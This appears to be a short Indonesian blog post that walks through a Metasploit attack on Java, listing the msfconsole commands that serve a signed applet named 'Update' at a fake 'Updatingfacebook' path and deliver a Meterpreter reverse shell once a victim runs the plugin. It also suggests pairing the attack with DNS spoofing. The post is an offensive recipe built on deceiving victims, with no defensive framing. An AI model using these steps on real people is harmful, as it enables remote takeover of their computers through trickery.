Kali ini saya mencoba untuk mengexploitasi java dengan
buka terminal
ketikkan msfconsole pada terminal
use exploit/multi/browser/java_signed_appletset payload windows/meterpreter/reverse_tcp
set appletname Update
set srvhost 192.168.1.74 (ip lokal kita)
set srvport 80
set uripath Updatingfacebook
set lhost 192.168.1.74 [ ip lokal kita ]set lport 443exploit
tunggu korban install plug ins
dan setelah korban meng running plugin
maka sesi telah terbuka
tehnik ini bisa digabungkan dengan spoofing pada dns
artikelnya bisa di lihat di --> http://www.cybersquads.com/2012/11/dns-spoof-dengan-ettercap-gui.html
atau
Post a Comment